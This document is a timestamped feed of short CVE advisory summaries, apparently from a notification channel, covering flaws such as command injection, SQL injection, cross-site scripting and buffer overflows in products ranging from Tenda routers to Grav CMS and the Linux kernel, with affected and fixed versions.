🚨 CVE-2023-6660When a program running on an affected system appends data to a file via an NFS client mount, the bug can cause the NFS client to fail to copy in the data to be written but proceed as though the copy operation had succeeded. This means that the data to be written is instead replaced with whatever data had been in the packet buffer previously. Thus, an unprivileged user with access to an affected system may abuse the bug to trigger disclosure of sensitive information. In particular, the leak is limited to data previously stored in mbufs, which are used for network transmission and reception, and for certain types of inter-process communication.The bug can also be triggered unintentionally by system applications, in which case the data written by the application to an NFS mount may be corrupted. Corrupted data is written over the network to the NFS server, and thus also susceptible to being snooped by other hosts on the network.Note that the bug exists only in the NFS client; the version and implementation of the server has no effect on whether a given system is affected by the problem.🎖@cveNotify |
|
| 2024-03-22 19:07:37 |
🚨 CVE-2024-29185FreeScout is a self-hosted help desk and shared mailbox. Versions prior to 1.8.128 are vulnerable to OS Command Injection in the /public/tools.php source file. The value of the php_path parameter is being executed as an OS command by the shell_exec function, without validating it. This allows an adversary to execute malicious OS commands on the server. A practical demonstration of the successful command injection attack extracted the /etc/passwd file of the server. This represented the complete compromise of the server hosting the FreeScout application. This attack requires an attacker to know the `App_Key` of the application. This limitation makes the Attack Complexity to be High. If an attacker gets hold of the `App_Key`, the attacker can compromise the Complete server on which the application is deployed. Version 1.8.128 contains a patch for this issue.🎖@cveNotify |
|
| 2024-03-22 19:07:36 |
🚨 CVE-2024-29042Translate is a package that allows users to convert text to different languages on Node.js and the browser. Prior to version 3.0.0, an attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users. The `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served. Version 3.0.0 fixes this issue.🎖@cveNotify |
|
| 2024-03-22 19:07:31 |
🚨 CVE-2023-23349Kaspersky has fixed a security issue in Kaspersky Password Manager (KPM) for Windows that allowed a local user to recover the auto-filled credentials from a memory dump when the KPM extension for Google Chrome is used. To exploit the issue, an attacker must trick a user into visiting a login form of a website with the saved credentials, and the KPM extension must autofill these credentials. The attacker must then launch a malware module to steal those specific credentials.🎖@cveNotify |
|
| 2024-03-22 19:07:30 |
🚨 CVE-2024-2228This vulnerability allows an authenticated user to perform a Lifecycle Manager flow or other QuickLink for a target user outside of the defined QuickLink Population.🎖@cveNotify |
|
| 2024-03-22 19:07:26 |
🚨 CVE-2022-32756IBM Security Verify Directory 10.0.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 228507.🎖@cveNotify |
|
| 2024-03-22 19:07:25 |
🚨 CVE-2022-32753IBM Security Verify Directory 10.0.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 228444.🎖@cveNotify |
|
| 2024-03-22 19:07:24 |
🚨 CVE-2022-32751IBM Security Verify Directory 10.0.0 could disclose sensitive server information that could be used in further attacks against the system. IBM X-Force ID: 228437.🎖@cveNotify |
|
| 2024-03-22 18:37:25 |
🚨 CVE-2024-2824A vulnerability was found in Matthias-Wandel jhead 3.08 and classified as critical. This issue affects the function PrintFormatNumber of the file exif.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257711.🎖@cveNotify |
|
| 2024-03-22 18:37:24 |
🚨 CVE-2023-4063Certain HP OfficeJet Pro printers are potentially vulnerable to a Denial of Service when using an improper eSCL URL GET request.🎖@cveNotify |
|
| 2024-03-22 16:37:34 |
🚨 CVE-2024-2821A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. Affected by this issue is some unknown functionality of the file /src/dede/friendlink_edit.php. The manipulation of the argument id leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 16:37:33 |
🚨 CVE-2024-2228This vulnerability allows an authenticated user to perform a Lifecycle Manager flow or other QuickLink for a target user outside of the defined QuickLink Population.🎖@cveNotify |
|
| 2024-03-22 16:37:29 |
🚨 CVE-2022-32756IBM Security Verify Directory 10.0.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 228507.🎖@cveNotify |
|
| 2024-03-22 16:37:28 |
🚨 CVE-2022-32754IBM Security Verify Directory 10.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 228445.🎖@cveNotify |
|
| 2024-03-22 16:37:27 |
🚨 CVE-2022-32751IBM Security Verify Directory 10.0.0 could disclose sensitive server information that could be used in further attacks against the system. IBM X-Force ID: 228437.🎖@cveNotify |
|
| 2024-03-22 15:37:24 |
🚨 CVE-2023-29581yasm 1.3.0.55.g101bc has a segmentation violation in the function delete_Token at modules/preprocs/nasm/nasm-pp.c. NOTE: although a libyasm application could become unavailable if this were exploited, the vendor's position is that there is no security relevance because there is either supposed to be input validation before data reaches libyasm, or a sandbox in which the application runs.🎖@cveNotify |
|
| 2024-03-22 14:37:32 |
🚨 CVE-2024-2725Information exposure vulnerability in the CIGESv2 system. A remote attacker might be able to access /vendor/composer/installed.json and retrieve all installed packages used by the application.🎖@cveNotify |
|
| 2024-03-22 14:37:26 |
🚨 CVE-2024-2724SQL injection vulnerability in the CIGESv2 system, through /ajaxServiciosAtencion.php, in the 'idServicio' parameter. The exploitation of this vulnerability could allow a remote user to retrieve all data stored in the database by sending a specially crafted SQL query.🎖@cveNotify |
|
| 2024-03-22 14:37:25 |
🚨 CVE-2024-2449A cross-site request forgery vulnerability has been identified in LoadMaster. It is possible for a malicious actor, who has prior knowledge of the IP or hostname of a specific LoadMaster, to direct an authenticated LoadMaster administrator to a third-party site. In such a scenario, the CSRF payload hosted on the malicious site would execute HTTP transactions on behalf of the LoadMaster administrator.🎖@cveNotify |
|
| 2024-03-22 14:37:24 |
🚨 CVE-2024-2448An OS command injection vulnerability has been identified in LoadMaster. An authenticated UI user with any permission settings may be able to inject commands into a UI component using a shell command resulting in OS command injection.🎖@cveNotify |
|
| 2024-03-22 13:07:38 |
🚨 CVE-2024-28116Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue.🎖@cveNotify |
|
| 2024-03-22 13:07:32 |
🚨 CVE-2024-27921Grav is an open-source, flat-file content management system. A file upload path traversal vulnerability has been identified in the application prior to version 1.7.45, enabling attackers to replace or create files with extensions like .json, .zip, .css, .gif, etc. This critical security flaw poses severe risks, that can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing files or creating new ones, and exfiltrate sensitive data using CSS exfiltration techniques. Upgrading to patched version 1.7.45 can mitigate the issue.🎖@cveNotify |
|
| 2024-03-22 13:07:31 |
🚨 CVE-2024-2767A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/forgot-password.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257603.🎖@cveNotify |
|
| 2024-03-22 13:07:26 |
🚨 CVE-2024-2764A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.48. This affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument endIP leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257601 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 13:07:25 |
🚨 CVE-2024-1727To prevent malicious 3rd party websites from making requests to Gradio applications running locally, this PR tightens the CORS rules around Gradio applications. In particular, it checks to see if the host header is localhost (or one of its aliases) and if so, it requires the origin header (if present) to be localhost (or one of its aliases) as well.🎖@cveNotify |
|
| 2024-03-22 12:37:25 |
🚨 CVE-2024-28560SQL injection vulnerability in Niushop B2B2C v.5.3.3 and before allows an attacker to escalate privileges via the deleteArea() function of the Address.php component.🎖@cveNotify |
|
| 2024-03-22 12:37:24 |
🚨 CVE-2024-25168SQL injection vulnerability in snow snow v.2.0.0 allows a remote attacker to execute arbitrary code via the dataScope parameter of the system/role/list interface.🎖@cveNotify |
|
| 2024-03-22 11:37:32 |
🚨 CVE-2024-1848Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in SOLIDWORKS Desktop on Release SOLIDWORKS 2024.These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, DWG, DXF, IPT, JT, SAT, SLDDRW, SLDPRT, STL, STP, X_B or X_T file.🎖@cveNotify |
|
| 2024-03-22 11:37:26 |
🚨 CVE-2024-1742Invocation of the sqlplus command with sensitive information in the command line in the mk_oracle Checkmk agent plugin before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows the extraction of this information from the process list.🎖@cveNotify |
|
| 2024-03-22 11:37:25 |
🚨 CVE-2022-22817PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method. A lambda expression could also be used.🎖@cveNotify |
|
| 2024-03-22 11:37:24 |
🚨 CVE-2021-23437The package pillow 5.2.0 and before 8.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the getrgb function.🎖@cveNotify |
|
| 2024-03-22 07:37:25 |
🚨 CVE-2024-2813A vulnerability was found in Tenda AC15 15.03.20_multi. It has been declared as critical. This vulnerability affects the function form_fast_setting_wifi_set of the file /goform/fast_setting_wifi_set. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257668. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 07:37:24 |
🚨 CVE-2024-2812A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been classified as critical. This affects the function formWriteFacMac of the file /goform/WriteFacMac. The manipulation of the argument mac leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257667. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 06:37:25 |
🚨 CVE-2024-2810A vulnerability has been found in Tenda AC15 15.03.05.18/15.03.20_multi and classified as critical. Affected by this vulnerability is the function formWifiWpsOOB of the file /goform/WifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257665 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 06:37:24 |
🚨 CVE-2024-2809A vulnerability, which was classified as critical, was found in Tenda AC15 15.03.05.18/15.03.20_multi. Affected is the function formSetFirewallCfg of the file /goform/SetFirewallCfg. The manipulation of the argument firewallEn leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257664. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 05:37:25 |
🚨 CVE-2024-2806A vulnerability classified as critical has been found in Tenda AC15 15.03.05.18/15.03.20_multi. This affects the function addWifiMacFilter of the file /goform/addWifiMacFilter. The manipulation of the argument deviceId/deviceMac leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257661 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 05:37:24 |
🚨 CVE-2024-29275SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php.🎖@cveNotify |
|
| 2024-03-22 04:37:27 |
🚨 CVE-2024-29272Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.🎖@cveNotify |
|
| 2024-03-22 04:37:26 |
🚨 CVE-2024-25808Cross-site Request Forgery (CSRF) vulnerability in Lychee version 3.1.6, allows remote attackers to execute arbitrary code via the create new album function.🎖@cveNotify |
|
| 2024-03-22 03:37:29 |
🚨 CVE-2024-2805A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been rated as critical. Affected by this issue is the function formSetSpeedWan of the file /goform/SetSpeedWan. The manipulation of the argument speed_dir leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257660. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-22 03:37:28 |
🚨 CVE-2024-25807Cross Site Scripting (XSS) vulnerability in Lychee 3.1.6, allows remote attackers to execute arbitrary code and obtain sensitive information via the title parameter when creating an album.🎖@cveNotify |
|
| 2024-03-22 03:37:27 |
🚨 CVE-2024-27516Server-Side Template Injection (SSTI) vulnerability in livehelperchat before 4.34v, allows remote attackers to execute arbitrary code and obtain sensitive information via the search parameter in lhc_web/modules/lhfaq/faqweight.php.🎖@cveNotify |
|
| 2024-03-22 02:37:32 |
🚨 CVE-2024-2182A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.🎖@cveNotify |
|
| 2024-03-22 02:37:26 |
🚨 CVE-2024-28180Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3.🎖@cveNotify |
|
| 2024-03-22 02:37:25 |
🚨 CVE-2024-23280An injection issue was addressed with improved validation. This issue is fixed in Safari 17.4, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-03-22 02:37:24 |
🚨 CVE-2024-23263A logic issue was addressed with improved validation. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, Safari 17.4. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.🎖@cveNotify |
|
| 2024-03-22 01:37:25 |
🚨 CVE-2024-2778A vulnerability was found in Campcodes Online Marriage Registration System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257612.🎖@cveNotify |
|
| 2024-03-22 01:07:24 |
🚨 CVE-2024-24693Improper access control in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.🎖@cveNotify |
|
| 2024-03-22 00:37:25 |
🚨 CVE-2024-2777A vulnerability has been found in Campcodes Online Marriage Registration System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/application-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257611.🎖@cveNotify |
|
| 2024-03-22 00:37:24 |
🚨 CVE-2024-2776A vulnerability, which was classified as critical, was found in Campcodes Online Marriage Registration System 1.0. Affected is an unknown function of the file /admin/search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257610 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-21 23:37:32 |
🚨 CVE-2024-28045Improper neutralization of input within the affected product could lead to cross-site scripting.🎖@cveNotify |
|
| 2024-03-21 23:37:25 |
🚨 CVE-2024-23494SQL injection vulnerability exists in GetDIAE_unListParameters.🎖@cveNotify |
|
| 2024-03-21 23:37:24 |
🚨 CVE-2023-42954A privilege escalation issue existed in FileMaker Server, potentially exposing sensitive information to front-end websites when signed in to the Admin Console with an administrator role. This issue has been fixed in FileMaker Server 20.3.1 by reducing the information sent in requests.🎖@cveNotify |
|
| 2024-03-21 22:37:32 |
🚨 CVE-2024-28116Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue.🎖@cveNotify |
|
| 2024-03-21 22:37:26 |
🚨 CVE-2024-28029Privileges are not fully verified server-side, which can be abused by a user with limited privileges to bypass authorization and access privileged functionality.🎖@cveNotify |
|
| 2024-03-21 22:37:25 |
🚨 CVE-2024-24272An issue in iTop DualSafe Password Manager & Digital Vault before 1.4.24 allows a local attacker to obtain sensitive information via leaked credentials as plaintext in a log file that can be accessed by the local user without knowledge of the master secret.🎖@cveNotify |
|
| 2024-03-21 22:37:24 |
🚨 CVE-2023-36483Authorization bypass can be achieved by session ID prediction in MASmobile Classic Android version 1.16.18 and earlier and MASmobile Classic iOS version 1.7.24 and earlierwhich allows remote attackers to retrieve sensitive data including customer data, security system status, and event history.🎖@cveNotify |
|
| 2024-03-21 21:37:25 |
🚨 CVE-2024-2764A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.48. This affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument endIP leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257601 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-21 21:37:24 |
🚨 CVE-2024-28756The SolarEdge mySolarEdge application before 2.20.1 for Android has a certificate verification issue that allows a Machine-in-the-middle (MitM) attacker to read and alter all network traffic between the application and the server.🎖@cveNotify |
|
| 2024-03-21 21:07:33 |
🚨 CVE-2024-24692Race condition in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.🎖@cveNotify |
|
| 2024-03-21 21:07:32 |
🚨 CVE-2024-21407Windows Hyper-V Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-21 21:07:31 |
🚨 CVE-2024-21390Microsoft Authenticator Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-21 21:07:28 |
🚨 CVE-2024-21761An improper authorization vulnerability [CWE-285] in FortiPortal version 7.2.0, and versions 7.0.6 and below reports may allow a user to download other organizations reports via modification in the request payload.🎖@cveNotify |
|
| 2024-03-21 21:07:27 |
🚨 CVE-2024-28553Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the entrys parameter fromAddressNat function.🎖@cveNotify |
|
| 2024-03-21 21:07:26 |
🚨 CVE-2024-28535Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the mitInterface parameter of fromAddressNat function.🎖@cveNotify |
|
| 2024-03-21 20:37:24 |
🚨 CVE-2024-28252CoreWCF is a port of the service side of Windows Communication Foundation (WCF) to .NET Core. If you have a NetFraming based CoreWCF service, extra system resources could be consumed by connections being left established instead of closing or aborting them. There are two scenarios when this can happen. When a client established a connection to the service and sends no data, the service will wait indefinitely for the client to initiate the NetFraming session handshake. Additionally, once a client has established a session, if the client doesn't send any requests for the period of time configured in the binding ReceiveTimeout, the connection is not properly closed as part of the session being aborted. The bindings affected by this behavior are NetTcpBinding, NetNamedPipeBinding, and UnixDomainSocketBinding. Only NetTcpBinding has the ability to accept non local connections. The currently supported versions of CoreWCF are v1.4.x and v1.5.x. The fix can be found in v1.4.2 and v1.5.2 of the CoreWCF packages. Users are advised to upgrade. There are no workarounds for this issue.🎖@cveNotify |
|
| 2024-03-21 20:07:32 |
🚨 CVE-2023-49837Uncontrolled Resource Consumption vulnerability in David Artiss Code Embed.This issue affects Code Embed: from n/a through 2.3.6.🎖@cveNotify |
|
| 2024-03-21 20:07:25 |
🚨 CVE-2021-1513A vulnerability in the vDaemon process of Cisco SD-WAN Software could allow an unauthenticated, remote attacker to cause a device to reload, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient handling of malformed packets. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.🎖@cveNotify |
|
| 2024-03-21 20:07:24 |
🚨 CVE-2021-1262Multiple vulnerabilities in Cisco SD-WAN products could allow an authenticated attacker to perform command injection attacks against an affected device, which could allow the attacker to take certain actions with root privileges on the device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-03-21 19:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-03-21 17:38:16 |
🚨 CVE-2024-2579Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Data443 Tracking Code Manager.This issue affects Tracking Code Manager: from n/a through 2.0.16.🎖@cveNotify |
|
| 2024-03-21 17:38:15 |
🚨 CVE-2024-29180Prior to versions 7.1.0, 6.1.2, and 5.3.4, the webpack-dev-middleware development middleware for devpack does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine. The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory `memfs` filesystem. If `writeToDisk` configuration option is set to `true`, the physical filesystem is used. The `getFilenameFromUrl` method is used to parse URL and build the local file path. The public path prefix is stripped from the URL, and the `unsecaped` path suffix is appended to the `outputPath`. As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use `%2e` and `%2f` sequences to perform path traversal attack.Developers using `webpack-dev-server` or `webpack-dev-middleware` are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content. If the development server is listening on a public IP address (or `0.0.0.0`), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port). If the server allows access from third-party domains, an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files. Starting with fixed versions 7.1.0, 6.1.2, and 5.3.4, the URL is unescaped and normalized before any further processing.🎖@cveNotify |
|
| 2024-03-21 17:38:10 |
🚨 CVE-2024-27964Unrestricted Upload of File with Dangerous Type vulnerability in Gesundheit Bewegt GmbH Zippy.This issue affects Zippy: from n/a through 1.6.9.🎖@cveNotify |
|
| 2024-03-21 17:38:09 |
🚨 CVE-2024-27962Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Florian 'fkrauthan' Krauthan allows Reflected XSS.This issue affects wp-mpdf: from n/a through 3.7.1.🎖@cveNotify |
|
| 2024-03-21 17:38:04 |
🚨 CVE-2024-27190Missing Authorization vulnerability in Jean-David Daviet Download Media.This issue affects Download Media: from n/a through 1.4.2.🎖@cveNotify |
|
| 2024-03-21 17:38:03 |
🚨 CVE-2022-44595Improper Authentication vulnerability in Melapress WP 2FA allows Authentication Bypass.This issue affects WP 2FA: from n/a through 2.2.0.🎖@cveNotify |
|
| 2024-03-21 14:38:02 |
🚨 CVE-2024-2494A flaw was found in the RPC library APIs of libvirt. The RPC server deserialization code allocates memory for arrays before the non-negative length check is performed by the C API entry points. Passing a negative length to the g_new0 function results in a crash due to the negative length being treated as a huge positive number. This flaw allows a local, unprivileged user to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-03-21 14:38:01 |
🚨 CVE-2024-29878Cross-Site Scripting (XSS) vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/sitepreference/add, 'description' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.🎖@cveNotify |
|
| 2024-03-21 14:37:56 |
🚨 CVE-2024-29876SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/reports/activitylogreport, 'sortby' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.🎖@cveNotify |
|
| 2024-03-21 14:37:55 |
🚨 CVE-2024-29873SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/reports/businessunits/format/html, 'bunitname' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.🎖@cveNotify |
|
| 2024-03-21 14:37:50 |
🚨 CVE-2024-29871SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/index/getdepartments/sentrifugo/index.php/index/updatecontactnumber, 'id' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.🎖@cveNotify |
|
| 2024-03-21 14:37:49 |
🚨 CVE-2024-28834A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel.🎖@cveNotify |
|
| 2024-03-21 11:37:59 |
🚨 CVE-2024-26643In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeoutWhile the rhashtable set gc runs asynchronously, a race allows it tocollect elements from anonymous sets with timeouts while it is beingreleased from the commit path.Mingi Cho originally reported this issue in a different path in 6.1.xwith a pipapo set with low timeouts which is not possible upstream since7395dfacfff6 ("netfilter: nf_tables: use timestamp to check for setelement timeout").Fix this by setting on the dead flag for anonymous sets to skip async gcin this case.According to 08e4c8c5919f ("netfilter: nf_tables: mark newset as dead ontransaction abort"), Florian plans to accelerate abort path by releasingobjects via workqueue, therefore, this sets on the dead flag for abortpath too.🎖@cveNotify |
|
| 2024-03-21 11:37:58 |
🚨 CVE-2023-52620In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: disallow timeout for anonymous setsNever used from userspace, disallow these parameters.🎖@cveNotify |
|
| 2024-03-21 10:37:51 |
🚨 CVE-2024-27438Download of Code Without Integrity Check vulnerability in Apache Doris.The jdbc driver files used for JDBC catalog is not checked and may resulting in remote command execution.Once the attacker is authorized to create a JDBC catalog, he/she can use arbitrary driver jar file with unchecked code snippet. This code snippet will be run when catalog is initializing without any check.This issue affects Apache Doris: from 1.2.0 through 2.0.4.Users are recommended to upgrade to version 2.0.5 or 2.1.x, which fixes the issue.🎖@cveNotify |
|
| 2024-03-21 10:37:50 |
🚨 CVE-2024-26307Possible race condition vulnerability in Apache Doris.Some of code using `chmod()` method. This method run the risk of someone renaming the file out from under user and chmodding the wrong file.This could theoretically happen, but the impact would be minimal.This issue affects Apache Doris: before 1.2.8, before 2.0.4.Users are recommended to upgrade to version 2.0.4, which fixes the issue.🎖@cveNotify |
|
| 2024-03-21 07:38:02 |
🚨 CVE-2024-2754A vulnerability classified as critical has been found in SourceCodester Complete E-Commerce Site 1.0. Affected is an unknown function of the file /admin/users_photo.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257544.🎖@cveNotify |
|
| 2024-03-21 00:37:24 |
🚨 CVE-2024-28916Xbox Gaming Services Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-20 23:37:45 |
🚨 CVE-2024-2443A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when configuring GeoJSON settings. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.13 and was fixed in versions 3.8.17, 3.9.12, 3.10.9, 3.11.7, and 3.12.1. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-03-20 22:37:50 |
🚨 CVE-2024-29026Owncast is an open source, self-hosted, decentralized, single user live video streaming and chat server. In versions 0.1.2 and prior, a lenient CORS policy allows attackers to make a cross origin request, reading privileged information. This can be used to leak the admin password. Commit 9215d9ba0f29d62201d3feea9e77dcd274581624 fixes this issue.🎖@cveNotify |
|
| 2024-03-20 22:37:49 |
🚨 CVE-2024-24050Cross Site Scripting (XSS) vulnerability in Sourcecodester Workout Journal App 1.0 allows attackers to run arbitrary code via parameters firstname and lastname in /add-user.php.🎖@cveNotify |
|
| 2024-03-20 21:37:44 |
🚨 CVE-2024-2718A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257471.🎖@cveNotify |
|
| 2024-03-20 21:37:43 |
🚨 CVE-2024-29474OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Management module.🎖@cveNotify |
|
| 2024-03-20 21:37:42 |
🚨 CVE-2024-29473OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Role Management module.🎖@cveNotify |
|
| 2024-03-20 21:37:39 |
